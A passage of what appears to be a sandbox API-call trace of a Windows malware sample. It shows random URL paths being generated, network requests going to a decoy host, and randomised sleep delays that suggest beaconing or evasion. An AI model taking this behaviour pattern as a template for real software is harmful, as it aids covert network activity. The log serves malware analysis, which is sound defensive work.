returned 0x7ffc5bcc36b0 [0252.816] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.816] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.816] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.817] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.817] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.817] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.817] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.817] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.817] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.817] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.817] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.817] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.817] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.817] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.817] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.818] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.818] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.818] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.818] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.818] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.818] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.818] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.818] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.819] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.819] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.819] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.819] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.819] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.819] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0252.819] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.819] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.819] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.820] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.820] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.820] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.820] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.820] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.820] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.820] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.820] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.820] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.820] GetProcessHeap () returned 0x440000 [0252.820] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472b10 [0252.820] lstrcpyA (in: lpString1=0x472b10, lpString2="\x81\x03" | out: lpString1="\x81\x03") returned="\x81\x03" [0252.820] lstrcatA (in: lpString1="\x81\x03", lpString2="/P81Otw94d4xiz5897L7i6wds8M6fwkj72oS4ctgbqoxpfss5/8If6qXbq8kbdemQjj25YWgvQ60uk0FSkxp56i2k7t2hAtyAB/eb4j6v1mzz17sgm1kZtr6c4/smzc48glgbncZkyi/igl3c3Y2nhypqrr01jevbtlrpeUs9brahb/" | out: lpString1="\x81\x03/P81Otw94d4xiz5897L7i6wds8M6fwkj72oS4ctgbqoxpfss5/8If6qXbq8kbdemQjj25YWgvQ60uk0FSkxp56i2k7t2hAtyAB/eb4j6v1mzz17sgm1kZtr6c4/smzc48glgbncZkyi/igl3c3Y2nhypqrr01jevbtlrpeUs9brahb/") returned="\x81\x03/P81Otw94d4xiz5897L7i6wds8M6fwkj72oS4ctgbqoxpfss5/8If6qXbq8kbdemQjj25YWgvQ60uk0FSkxp56i2k7t2hAtyAB/eb4j6v1mzz17sgm1kZtr6c4/smzc48glgbncZkyi/igl3c3Y2nhypqrr01jevbtlrpeUs9brahb/" [0252.821] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0252.821] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x81\x03/P81Otw94d4xiz5897L7i6wds8M6fwkj72oS4ctgbqoxpfss5/8If6qXbq8kbdemQjj25YWgvQ60uk0FSkxp56i2k7t2hAtyAB/eb4j6v1mzz17sgm1kZtr6c4/smzc48glgbncZkyi/igl3c3Y2nhypqrr01jevbtlrpeUs9brahb/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0252.821] GetProcessHeap () returned 0x440000 [0252.821] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472b10 | out: hHeap=0x440000) returned 1 [0252.821] GetProcessHeap () returned 0x440000 [0252.821] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a02350 | out: hHeap=0x440000) returned 1 [0252.821] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0252.821] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0252.822] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.822] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0252.822] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0252.822] Sleep (dwMilliseconds=0x1b79f) [0252.968] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.968] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0252.968] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.968] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0252.969] GetProcessHeap () returned 0x440000 [0252.969] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x33) returned 0x4f59b0 [0252.969] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.969] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0252.969] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.969] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4f59b1, cbBuffer=0x18, dwFlags=0x2 | out: pbBuffer=0x4f59b1) returned 0x0 [0252.969] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.969] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.969] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.970] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.970] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.970] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.970] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.970] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.970] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.970] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.970] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.970] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.971] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.971] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.971] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.971] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.971] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.971] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.971] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.971] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.972] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.972] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.972] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.972] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.972] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.972] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.972] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.972] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.972] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.972] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.973] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.973] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.973] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.973] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.973] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.973] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.973] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.973] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.973] GetProcessHeap () returned 0x440000 [0252.973] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473140 [0252.973] lstrcpyA (in: lpString1=0x473140, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0252.974] lstrcatA (in: lpString1="\x04", lpString2="/id8falOe57y31gaydn981Uc/" | out: lpString1="\x04/id8falOe57y31gaydn981Uc/") returned="\x04/id8falOe57y31gaydn981Uc/" [0252.974] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0252.974] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/id8falOe57y31gaydn981Uc/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0252.974] GetProcessHeap () returned 0x440000 [0252.974] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473140 | out: hHeap=0x440000) returned 1 [0252.974] GetProcessHeap () returned 0x440000 [0252.974] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4f59b0 | out: hHeap=0x440000) returned 1 [0252.974] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0252.974] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0252.975] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.975] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0252.975] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0252.975] Sleep (dwMilliseconds=0x12d04) [0253.125] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.125] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0253.126] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.126] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0253.126] GetProcessHeap () returned 0x440000 [0253.126] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x33) returned 0x4f5070 [0253.126] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.126] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0253.126] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.126] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4f5071, cbBuffer=0x26, dwFlags=0x2 | out: pbBuffer=0x4f5071) returned 0x0 [0253.126] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.126] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.127] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.127] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0253.127] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.127] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.127] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.127] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.127] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.127] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0253.127] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.127] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.128] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.128] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0253.128] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.128] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.128] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.128] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.128] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.128] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.128] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.128] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.128] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.129] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.129] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.129] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0253.129] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.129] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.129] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.129] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.129] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.129] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.130] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.130] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.130] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.130] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.130] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.130] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.130] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.130] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.130] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.130] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.130] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.130] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.131] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.131] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0253.131] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.131] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0253.131] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.131] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0253.131] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.131] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.131] GetProcessHeap () returned 0x440000 [0253.131] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473980 [0253.131] lstrcpyA (in: lpString1=0x473980, lpString2="û\x86#Rs://www.yahoo.com" | out: lpString1="û\x86#Rs://www.yahoo.com") returned="û\x86#Rs://www.yahoo.com" [0253.131] lstrcatA (in: lpString1="û\x86#Rs://www.yahoo.com", lpString2="/m4hgf6cG8h1zghKl9ne3bpnEzbrgwiim8He3f/" | out: lpString1="û\x86#Rs://www.yahoo.com/m4hgf6cG8h1zghKl9ne3bpnEzbrgwiim8He3f/") returned="û\x86#Rs://www.yahoo.com/m4hgf6cG8h1zghKl9ne3bpnEzbrgwiim8He3f/" [0253.131] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0253.132] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="û\x86#Rs://www.yahoo.com/m4hgf6cG8h1zghKl9ne3bpnEzbrgwiim8He3f/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0253.132] GetProcessHeap () returned 0x440000 [0253.132] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473980 | out: hHeap=0x440000) returned 1 [0253.132] GetProcessHeap () returned 0x440000 [0253.132] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4f5070 | out: hHeap=0x440000) returned 1 [0253.132] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0253.132] GetProcAddress 